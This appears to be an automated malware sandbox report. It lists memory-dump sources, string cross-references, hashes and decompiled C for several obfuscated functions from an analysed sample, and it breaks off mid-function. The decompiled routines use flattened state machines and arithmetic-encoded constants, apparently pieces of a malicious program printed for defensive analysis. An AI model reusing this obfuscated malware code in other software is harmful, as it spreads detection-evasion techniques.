/, xrefs: 0022A28B
L, xrefs: 0022A331
g]ht, xrefs: 0022A2C8
c~, xrefs: 0022A273

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 2a$L$c~$g]ht$/$V=$_
API String ID: 0-445983283
Opcode ID: b29492d7bcf8f9de18b85760e04bef38c4de7e1b5825448b4405192dbe448e3f
Instruction ID: 0995944fd301749d6b219a1f7306dfee6c1498d3861df14e345e934163ef84f1
Opcode Fuzzy Hash: b29492d7bcf8f9de18b85760e04bef38c4de7e1b5825448b4405192dbe448e3f
Instruction Fuzzy Hash: 01D163725187819FD368CFA5D48991FBBE1FBC4718F60890CF596862A0C7B49919CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00227F1F, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00227F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00227F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E0021D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00227F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00227F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E0021D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00227F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E0021D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00227F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}

0x00227f1f
0x00227f22
0x00227f2c
0x00227f34
0x00227f40
0x00227f42
0x00227f44
0x00227f48
0x00227f4d
0x00227f55
0x00227f60
0x00227f65
0x00227f6b
0x00227f73
0x00227f7b
0x00227f83
0x00227f8b
0x00227f93
0x00227f9b
0x00227fa0
0x00227fa8
0x00227fb0
0x00227fb8
0x00227fbd
0x00227fc7
0x00227fca
0x00227fce
0x00227fd6
0x00227fe6
0x00227fea
0x00227ff2
0x00227ffa
0x00228002
0x0022800a
0x00228012
0x0022801a
0x00228022
0x0022802a
0x00228032
0x0022803a
0x00228042
0x0022804a
0x00228052
0x0022805a
0x00228062
0x00228067
0x0022806f
0x00228077
0x0022807f
0x00228084
0x0022808c
0x00228094
0x002280a0
0x002280a3
0x002280a7
0x002280af
0x002280b7
0x002280bf
0x002280c9
0x002280cd
0x002280d5
0x002280dd
0x002280e5
0x002280ed
0x002280f5
0x0022810b
0x0022810f
0x00228114
0x0022811c
0x00228124
0x00228134
0x00228138
0x00228144
0x00228149
0x0022814f
0x00228157
0x00228164
0x00228165
0x00228169
0x00228171
0x00228179
0x00228181
0x00228186
0x0022818e
0x00228196
0x0022819b
0x002281a3
0x002281ab
0x002281b3
0x002281bb
0x002281bf
0x002281c7
0x002281d4
0x002281dd
0x002281e1
0x002281e9
0x002281f6
0x002281fa
0x00228202
0x0022820a
0x00228218
0x0022821c
0x0022821c
0x00228224
0x00228224
0x00228224
0x00228224
0x00228226
0x00000000
0x00000000
0x0022822c
0x002282c7
0x002282c8
0x002282cd
0x002282d0
0x002282d5
0x00000000
0x00228232
0x00228238
0x002282b5
0x00000000
0x0022823a
0x00228240
0x0022829d
0x002282a1
0x002282a6
0x002282a9
0x002282ae
0x00000000
0x00228242
0x00228248
0x0022827b
0x0022827c
0x00228281
0x00228284
0x00228289
0x00000000
0x0022824a
0x00228250
0x00000000
0x00228256
0x0022825e
0x00228267
0x00228267
0x00228250
0x00228248
0x00228240
0x00228238
0x00228269
0x00228272
0x00228272
0x002282e2
0x00228368
0x0022836c
0x00228371
0x00228374
0x00228379
0x00000000
0x002282e4
0x002282ea
0x00228346
0x00228347
0x0022834c
0x0022834f
0x00228351
0x00000000
0x002282ec
0x002282f2
0x00228326
0x0022832a
0x0022832f
0x00228332
0x00228337
0x00000000
0x002282f4
0x002282fa
0x00000000
0x002282fc
0x00228304
0x00228305
0x0022830a
0x0022830d
0x00228312
0x00000000
0x00228312
0x002282fa
0x002282f2
0x002282ea
0x00000000
0x0022837b
0x0022837b
0x00000000

Strings

XW, xrefs: 0022808C
9c%', xrefs: 002282EC
,H, xrefs: 002281AB
9c%', xrefs: 002282B5
~, xrefs: 0022803A
bh, xrefs: 0022806F
S,, xrefs: 00228157

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ,H$9c%'$9c%'$S,$XW$bh$~
API String ID: 0-4263808623
Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction ID: b304e50b3015f3d8e72a21d616249f9d7e3e659e6e203c6606bb00c5610dcd47
Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction Fuzzy Hash: 75B152B29193819FD358CF65D98940BFBE1BBC4748F008A1DF58696260DBB5D909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002169A0, Relevance: 9.0, Strings: 7, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002169A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00218736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E0021F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x22ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x22ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E0022422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00226DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00211132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00229586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E002176DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}

0x002169a0
0x002169a3
0x002169af
0x002169b1
0x002169b3
0x002169b9
0x002169c1
0x002169c3
0x002169c8
0x002169cd
0x002169d5
0x002169dd
0x002169e5
0x002169ed
0x002169f5
0x002169fd
0x00216a0b
0x00216a10
0x00216a16
0x00216a1e
0x00216a26
0x00216a32
0x00216a37
0x00216a3d
0x00216a42
0x00216a4a
0x00216a52
0x00216a5a
0x00216a5f
0x00216a67
0x00216a6f
0x00216a77
0x00216a7f
0x00216a87
0x00216a8c
0x00216a94
0x00216a9c
0x00216aa4
0x00216aac
0x00216ab4
0x00216abc
0x00216ac4
0x00216acc
0x00216ad4
0x00216adc
0x00216ae4
0x00216aec
0x00216af1
0x00216af9
0x00216b01
0x00216b09
0x00216b11
0x00216b1a
0x00216b1d
0x00216b21
0x00216b29
0x00216b31
0x00216b39
0x00216b41
0x00216b49
0x00216b51
0x00216b59
0x00216b61
0x00216b69
0x00216b71
0x00216b79
0x00216b81
0x00216b8b
0x00216b90
0x00216b95
0x00216b9d
0x00216ba5
0x00216bad
0x00216bb5
0x00216bbd
0x00216bc5
0x00216bd2
0x00216bd6
0x00216bde
0x00216be6
0x00216bee
0x00216bf6
0x00216bfe
0x00216c06
0x00216c0e
0x00216c16
0x00216c1e
0x00216c1e
0x00216c1e
0x00216c23
0x00000000
0x00216c28
0x00216c28
0x00216c2e
0x00216d35
0x00216d36
0x00216d39
0x00216d3f
0x00216d43
0x00216d45
0x00216d4e
0x00216d53
0x00216d58
0x00216d5d
0x00000000
0x00216d5d
0x00216d47
0x00216d22
0x00216d22
0x00216cca
0x00216cca
0x00216ccf
0x00216ccf
0x00000000
0x00216ccf
0x00216c3a
0x00000000
0x00216d96
0x00216c42
0x00216d70
0x00216d73
0x00216d78
0x00216d7b
0x00000000
0x00216d7b
0x00216c4e
0x00216d17
0x00216d1d
0x00000000
0x00216d1d
0x00216c5a
0x00216cd9
0x00216ceb
0x00216cf0
0x00216cf3
0x00216cf6
0x00216cfd
0x00216d02
0x00216d07
0x00000000
0x00216d07
0x00216c5e
0x00216c93
0x00216cb0
0x00216cb5
0x00216cb8
0x00216cbb
0x00216cc2
0x00216cc7
0x00000000
0x00216cc7
0x00216c62
0x00000000
0x00000000
0x00216c77
0x00216c7c
0x00216c7f
0x00216c89
0x00216c8e
0x00000000
0x00216d62
0x00216d62
0x00216d62
0x00000000
0x00216c28
0x00216c28

Strings

?j, xrefs: 00216B39
y7X, xrefs: 00216B71
k<, xrefs: 00216A1E
.V, xrefs: 00216AD4
'&/U, xrefs: 00216AB4
"=, xrefs: 00216B79
GX, xrefs: 00216A67

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "=$'&/U$.V$?j$GX$y7X$k<
API String ID: 0-2482092835
Opcode ID: f6e577b095e6bc69374d2c5309fe5f7a421f8ed3f37e4b8841b949069e909cac
Instruction ID: d3bbfe952399ffa46371c5bacfa4929b2c2ff700b84c0012981cfb78089e8265
Opcode Fuzzy Hash: f6e577b095e6bc69374d2c5309fe5f7a421f8ed3f37e4b8841b949069e909cac
Instruction Fuzzy Hash: 08A19572528341AFD358CF25D58A40BFBE1FBE4354F408A1DF48A96260C7B5C959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00211280, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00211280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E0021B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E002250F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00228F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00228F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}

0x0021128a
0x00211291
0x00211298
0x0021129f
0x002112a0
0x002112a7
0x002112a8
0x002112a9
0x002112ae
0x002112b6
0x002112b9
0x002112c8
0x002112ca
0x002112d1
0x002112d4
0x002112d8
0x002112e0
0x002112e8
0x002112f0
0x002112f8
0x00211300
0x00211308
0x00211310
0x00211318
0x00211325
0x00211329
0x00211331
0x00211339
0x0021133d
0x00211345
0x0021134d
0x00211355
0x00211362
0x00211366
0x0021136e
0x00211376
0x00211381
0x00211382
0x00211388
0x00211390
0x00211398
0x002113a0
0x002113a5
0x002113a9
0x002113b1
0x002113b9
0x002113be
0x002113c6
0x002113ce
0x002113d3
0x002113db
0x002113eb
0x002113ef
0x002113f3
0x002113fb
0x00211403
0x0021140b
0x00211413
0x0021141b
0x00211423
0x00211432
0x00211433
0x00211447
0x0021144b
0x00211453
0x00211453
0x0021145d
0x0021152a
0x0021152c
0x00211463
0x00211469
0x002114cd
0x00000000
0x0021146b
0x0021146d
0x002114be
0x002114c3
0x002114c6
0x00000000
0x0021146f
0x00211475
0x00000000
0x0021147b
0x00211493
0x00211498
0x0021149d
0x002114a3
0x00000000
0x002114a3
0x0021149d
0x00211475
0x0021146d
0x00211469
0x00211530
0x0021153b
0x0021153b
0x002114e6
0x002114eb
0x002114ee
0x002114f0
0x002114fc
0x00000000
0x002114f2
0x002114f2
0x00000000
0x002114f2
0x00000000
0x00211501
0x00211501
0x00211501
0x00000000

Strings

5f:, xrefs: 00211366
uI, xrefs: 00211423
0Z, xrefs: 0021136E
zR, xrefs: 002112AE
uz, xrefs: 00211390
c;, xrefs: 002113F3

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0Z$5f:$c;$uI$uz$zR
API String ID: 0-4070947617
Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction ID: b28bda8e4cd5c47dec933ddf091808e79f7f8a5e337313e98ead1d0ba3230224
Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction Fuzzy Hash: F0615671119341AFD758CE20C98591FBBF1FBC9748F80991DF296862A0D7BACA588F43

Uniqueness

Uniqueness Score: -1.00%

Function 002117AC, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E002117AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0021602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
